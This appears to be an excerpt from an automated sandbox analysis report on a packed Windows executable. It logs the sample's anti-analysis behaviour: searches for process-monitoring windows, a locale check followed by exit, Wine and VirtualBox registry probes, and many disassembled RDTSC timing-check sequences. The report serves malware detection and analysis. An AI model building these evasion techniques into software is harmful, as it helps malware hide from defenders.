                Source: file.exeStatic PE information: section name: oxrzanjf entropy: 7.953822879686721

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EB9BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-36553
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8502 second address: 12F8506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8506 second address: 12F850E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F850E second address: 12F8528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8528 second address: 12F8531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8531 second address: 12F853C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F853C second address: 12F8540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1308A40 second address: 1308A82 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC850CE3D36h 0x00000008 jns 00007FC850CE3D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jbe 00007FC850CE3D36h 0x00000017 pop edi 0x00000018 jmp 00007FC850CE3D3Bh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jne 00007FC850CE3D4Ch 0x00000026 jmp 00007FC850CE3D46h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1308A82 second address: 1308AA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC8515781DAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC8515781DCh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1308AA4 second address: 1308AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130905E second address: 1309078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781DFh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309078 second address: 130908D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC850CE3D3Ah 0x00000008 jnp 00007FC850CE3D36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C2E8 second address: 130C328 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FC8515781DCh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC8515781E2h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C402 second address: 130C46D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 12440AF5h 0x00000010 add edi, dword ptr [ebp+122D3650h] 0x00000016 lea ebx, dword ptr [ebp+124521F1h] 0x0000001c mov edi, dword ptr [ebp+122D18CFh] 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 pushad 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 jmp 00007FC850CE3D42h 0x0000002c popad 0x0000002d pushad 0x0000002e push edi 0x0000002f pop edi 0x00000030 je 00007FC850CE3D36h 0x00000036 popad 0x00000037 popad 0x00000038 push eax 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC850CE3D42h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C46D second address: 130C471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C68E second address: 130C693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C693 second address: 130C737 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC8515781E1h 0x00000008 ja 00007FC8515781D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [esp], 773645E5h 0x00000018 stc 0x00000019 push 00000003h 0x0000001b sub dh, FFFFFFCEh 0x0000001e push 00000000h 0x00000020 mov esi, dword ptr [ebp+122D3494h] 0x00000026 push 00000003h 0x00000028 mov dx, CE01h 0x0000002c call 00007FC8515781D9h 0x00000031 jmp 00007FC8515781E0h 0x00000036 push eax 0x00000037 push ecx 0x00000038 jmp 00007FC8515781E1h 0x0000003d pop ecx 0x0000003e mov eax, dword ptr [esp+04h] 0x00000042 pushad 0x00000043 jp 00007FC8515781E5h 0x00000049 jmp 00007FC8515781DFh 0x0000004e pushad 0x0000004f pushad 0x00000050 popad 0x00000051 push ecx 0x00000052 pop ecx 0x00000053 popad 0x00000054 popad 0x00000055 mov eax, dword ptr [eax] 0x00000057 js 00007FC8515781DEh 0x0000005d jl 00007FC8515781D8h 0x00000063 push ebx 0x00000064 pop ebx 0x00000065 mov dword ptr [esp+04h], eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d jg 00007FC8515781D6h 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C737 second address: 130C74B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C74B second address: 130C755 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC8515781DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C755 second address: 130C7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov esi, eax 0x00000009 mov si, 7AF2h 0x0000000d lea ebx, dword ptr [ebp+12452205h] 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FC850CE3D38h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d jno 00007FC850CE3D47h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C7A2 second address: 130C7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC8515781D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C7AD second address: 130C7B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C7B3 second address: 130C7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132BEF5 second address: 132BF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C31A second address: 132C31E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C31E second address: 132C324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C324 second address: 132C32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C32A second address: 132C330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C330 second address: 132C334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C4BE second address: 132C4CA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC850CE3D36h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C63F second address: 132C660 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC8515781DAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c jl 00007FC8515781D6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007FC8515781D6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C660 second address: 132C664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C7BB second address: 132C7C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C7C1 second address: 132C7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FC850CE3D36h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C7DB second address: 132C7E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C7E1 second address: 132C7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC850CE3D36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C7ED second address: 132C7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C7F1 second address: 132C7FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132CACB second address: 132CAD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D1E9 second address: 132D1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D1ED second address: 132D1F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D1F1 second address: 132D1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D91F second address: 132D933 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC8515781D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D933 second address: 132D938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D938 second address: 132D94F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC8515781D6h 0x0000000a jmp 00007FC8515781DDh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D94F second address: 132D953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331D7B second address: 1331D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331D7F second address: 1331DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC850CE3D3Eh 0x0000000b popad 0x0000000c push eax 0x0000000d ja 00007FC850CE3D3Ah 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331DA8 second address: 1331DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1330C03 second address: 1330C18 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC850CE3D3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13340CD second address: 13340D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13340D1 second address: 13340D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338028 second address: 133803D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC8515781DFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133803D second address: 133804E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jbe 00007FC850CE3D36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13381FB second address: 1338229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b jmp 00007FC8515781E1h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC8515781DEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338229 second address: 133822D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338509 second address: 133850D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133850D second address: 1338519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13387F9 second address: 13387FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338A8F second address: 1338A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338A99 second address: 1338AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC8515781D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338AA3 second address: 1338AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133A287 second address: 133A28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133A28B second address: 133A2A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D44h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133A2A3 second address: 133A2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D94D second address: 133D952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133E397 second address: 133E3A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133E403 second address: 133E43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 jmp 00007FC850CE3D3Ch 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 or edi, dword ptr [ebp+122D2360h] 0x0000001f push eax 0x00000020 pushad 0x00000021 jmp 00007FC850CE3D3Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 push edi 0x00000029 pop edi 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133E82B second address: 133E82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133E82F second address: 133E839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133E839 second address: 133E86D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FC8515781E8h 0x00000010 jmp 00007FC8515781E0h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133E86D second address: 133E872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133E996 second address: 133E9C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC8515781DFh 0x00000008 jp 00007FC8515781D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC8515781DDh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133E9C1 second address: 133E9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC850CE3D3Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133E9CF second address: 133EA08 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC8515781D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FC8515781D8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jmp 00007FC8515781DAh 0x0000002c push eax 0x0000002d push ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133EA08 second address: 133EA0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133EEED second address: 133EEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133F87D second address: 133F892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340B13 second address: 1340B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340B17 second address: 1340B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FC850CE3D38h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D17B4h] 0x00000029 or edi, dword ptr [ebp+122D3049h] 0x0000002f push 00000000h 0x00000031 mov edi, 3A813983h 0x00000036 push 00000000h 0x00000038 jmp 00007FC850CE3D46h 0x0000003d xchg eax, ebx 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push esi 0x00000042 pop esi 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340B71 second address: 1340B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jo 00007FC8515781E2h 0x0000000e jo 00007FC8515781DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13401BA second address: 13401BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13401BF second address: 13401D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC8515781DBh 0x00000010 rdtsc
